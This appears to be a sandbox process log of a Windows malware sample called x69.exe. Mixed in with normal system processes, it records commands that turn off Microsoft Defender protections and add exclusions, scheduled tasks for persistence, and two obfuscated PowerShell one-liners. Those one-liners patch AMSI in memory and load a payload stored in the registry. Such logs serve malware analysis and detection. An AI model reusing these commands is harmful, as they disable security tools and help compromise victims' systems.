| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks |
| C:\Windows\system32\sihost.exe | sihost.exe |
| C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc |
| C:\Windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc |
| C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc |
| C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding |
| C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding |
| C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc |
| C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service |
| C:\Windows\system32\SppExtComObj.exe | C:\Windows\system32\SppExtComObj.exe -Embedding |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc |
| C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} |
| C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc |
| C:\Users\Admin\AppData\Local\Temp\x69.exe | "C:\Users\Admin\AppData\Local\Temp\x69.exe" |
| C:\Windows\system32\wbem\wmiprvse.exe | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe' |
| C:\Windows\system32\wbem\wmiprvse.exe | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
| C:\Windows\servicing\TrustedInstaller.exe | C:\Windows\servicing\TrustedInstaller.exe |
| C:\Windows\System32\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe |
| C:\Users\Admin\AppData\Roaming\x69.exe | "C:\Users\Admin\AppData\Roaming\x69.exe" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe' |
| C:\Users\Admin\AppData\Roaming\x69.exe | C:\Users\Admin\AppData\Roaming\x69.exe |
| C:\Windows\System32\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe |
| C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe' |
| C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe |
| C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe |
| C:\Windows\system32\cmd.exe | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\71A6.tmp\71A7.tmp\71A8.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc |
| C:\Windows\system32\cmd.exe | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7271.tmp\7272.tmp\7273.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" |
| C:\Program Files\Windows Defender\MpCmdRun.exe | "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true |
| C:\Program Files\Windows Defender\MpCmdRun.exe | "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true" |
| C:\Windows\System32\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true" |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe |
| C:\Users\Admin\AppData\Roaming\x69install.exe | "C:\Users\Admin\AppData\Roaming\x69install.exe" |
| C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe |
| C:\Users\Admin\AppData\Roaming\x69install.exe | C:\Users\Admin\AppData\Roaming\x69install.exe |
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:ZnUQyXlWTWsj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SfOXcgckuEyuGt,[Parameter(Position=1)][Type]$UTUpuZnLwH)$qUHKBJxSYNY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+'le'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'T'+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+'ss'+[Char](44)+'A'+'u'+''+'t'+''+[Char](111)+'C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qUHKBJxSYNY.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+'e'+'cia'+[Char](108)+''+'N'+''+[Char](97)+'me,'+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+','+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$SfOXcgckuEyuGt).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$qUHKBJxSYNY.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+'c'+','+''+[
Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+'S'+'i'+'g'+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$UTUpuZnLwH,$SfOXcgckuEyuGt).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+[Char](101)+'d');Write-Output $qUHKBJxSYNY.CreateType();}$TZAEQWjGXDmSs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+'o'+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+'i'+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+'a'+[Char](102)+'e'+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+''+[Char](101)+'M'+'e'+''+'t'+''+[Char](104)+''+[Char](111)+'d'+'s'+'');$KybpxFYdMHuPhT=$TZAEQWjGXDmSs.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+'dr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+','+'S'+'t'+'a'+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TLljcKwpGUOLINyQcAm=ZnUQyXlWTWsj @([String])([IntPtr]);$aZjbOxNcdAXjGuztqCtRKd=ZnUQyXlWTWsj 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mrKkGBnfHCD=$TZAEQWjGXDmSs.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$IPUohhNAJNPeQp=$KybpxFYdMHuPhT.Invoke($Null,@([Object]$mrKkGBnfHCD,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+'L'+'ib'+[Char](114)+''+[Char](97)+'ry'+[Char](65)+'')));$BsHbkCgAwWjGnYEJu=$KybpxFYdMHuPhT.Invoke($Null,@([Object]$mrKkGBnfHCD,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+'P'+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$KNtegdh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IPUohhNAJNPeQp,$TLljcKwpGUOLINyQcAm).Invoke(''+[Char](97)+'ms'+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$XUgGyysuMXtOUCXGP=$KybpxFYdMHuPhT.Invoke($Null,@([Object]$KNtegdh,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+[Char](110)+''+[Char](66)+'u'+[Char](102)+'f'+'e'+''+[Char](114)+'')));$bYDKaTbANg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BsHbkCgAwWjGnYEJu,$aZjbOxNcdAXjGuztqCtRKd).Invoke($XUgGyysuMXtOUCXGP,[uint32]8,4,[ref]$bYDKaTbANg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XUgGyysuMXtOUCXGP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BsHbkCgAwWjGnYEJu,$aZjbOxNcdAXjGuztqCtRKd).Invoke($XUgGyysuMXtOUCXGP,[uint32]8,0x20,[ref]$bYDKaTbANg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+'T'+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](120)+''+[Char](54)+'9'+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:tTTOCAxvJSUr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$nQlLGRSUSBCeKk,[Parameter(Position=1)][Type]$ywlBvduSJp)$LwbqvrTVtWC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+''+'m'+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+'d'+'u'+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+'as'+'s'+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+','+'A'+'u'+''+[Char](116)+'o'+'C'+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$LwbqvrTVtWC.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+'e'+'c'+''+[Char](105)+'a'+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$nQlLGRSUSBCeKk).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+'M'+'a'+[Char](110)+''+'a'+'g'+[Char](101)+''+'d'+'');$LwbqvrTVtWC.DefineMethod('I'+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+'u'+'b'+'li'+'c'+''+[Char](44)
+'Hid'+'e'+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+'lot,'+'V'+''+'i'+''+'r'+'tu'+'a'+''+'l'+'',$ywlBvduSJp,$nQlLGRSUSBCeKk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+'a'+''+[Char](110)+'ag'+[Char](101)+''+'d'+'');Write-Output $LwbqvrTVtWC.CreateType();}$wGrWkHPpWUHke=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+'m'+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+''+[Char](87)+'i'+'n'+'3'+[Char](50)+''+'.'+'Un'+'s'+'a'+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$xtOMhiYmxIUDdI=$wGrWkHPpWUHke.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+'r'+''+[Char](111)+'cA'+[Char](100)+''+'d'+''+[Char](114)+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PZvdrMKapPOdAvvYEdz=tTTOCAxvJSUr @([String])([IntPtr]);$AyaPcHdgEbThyubIxsHfNV=tTTOCAxvJSUr 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$DwcusrERtjr=$wGrWkHPpWUHke.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+'l'+[Char](108)+'')));$aSASWrPVCjGGKu=$xtOMhiYmxIUDdI.Invoke($Null,@([Object]$DwcusrERtjr,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+'L'+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$nYHIVLkazvLFSzIKf=$xtOMhiYmxIUDdI.Invoke($Null,@([Object]$DwcusrERtjr,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+''+'e'+''+[Char](99)+'t')));$yGQlvzU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aSASWrPVCjGGKu,$PZvdrMKapPOdAvvYEdz).Invoke(''+'a'+'m'+[Char](115)+''+'i'+''+'.'+''+'d'+''+[Char](108)+''+'l'+'');$EjalRQKfExDuBjCis=$xtOMhiYmxIUDdI.Invoke($Null,@([Object]$yGQlvzU,[Object](''+[Char](65)+''+'m'+''+'s'+''+'i'+'S'+[Char](99)+'anB'+'u'+'f'+'f'+''+'e'+'r')));$SPdlteeqMb=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nYHIVLkazvLFSzIKf,$AyaPcHdgEbThyubIxsHfNV).Invoke($EjalRQKfExDuBjCis,[uint32]8,4,[ref]$SPdlteeqMb);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EjalRQKfExDuBjCis,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nYHIVLkazvLFSzIKf,$AyaPcHdgEbThyubIxsHfNV).Invoke($EjalRQKfExDuBjCis,[uint32]8,0x20,[ref]$SPdlteeqMb);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](120)+''+'6'+''+[Char](57)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\smartscreen.exe
C:\Windows\System32\smartscreen.exe -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1976 -prefsLen 27100 -prefMapHandle 1980 -prefMapSize 270279 -ipcHandle 2068 -initialChannelId {21571c9d-3048-4321-9836-e694bf23e461} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2428 -prefsLen 27136 -prefMapHandle 2432 -prefMapSize 270279 -ipcHandle 2440 -initialChannelId {0edd748a-82c0-4aca-b2b9-fb787fb13589} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3760 -prefsLen 27277 -prefMapHandle 3764 -prefMapSize 270279 -jsInitHandle 3768 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3776 -initialChannelId {d458b5a4-b9bd-41d8-a284-8dc8eb3b2b80} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3924 -prefsLen 27277 -prefMapHandle 3928 -prefMapSize 270279 -ipcHandle 4032 -initialChannelId {505e0550-0c60-4cc2-b67c-36a4c6a346a5} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4520 -prefsLen 34776 -prefMapHandle 4528 -prefMapSize 270279 -jsInitHandle 4532 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2984 -initialChannelId {90df4ef6-3010-4d3f-9f14-f3f54ece2a3e} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5088 -prefsLen 35013 -prefMapHandle 5092 -prefMapSize 270279 -ipcHandle 1504 -initialChannelId {10f2cfd3-048f-4fad-8605-351904c8cf1e} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Program Files\Mozilla Firefox\firefox.exe
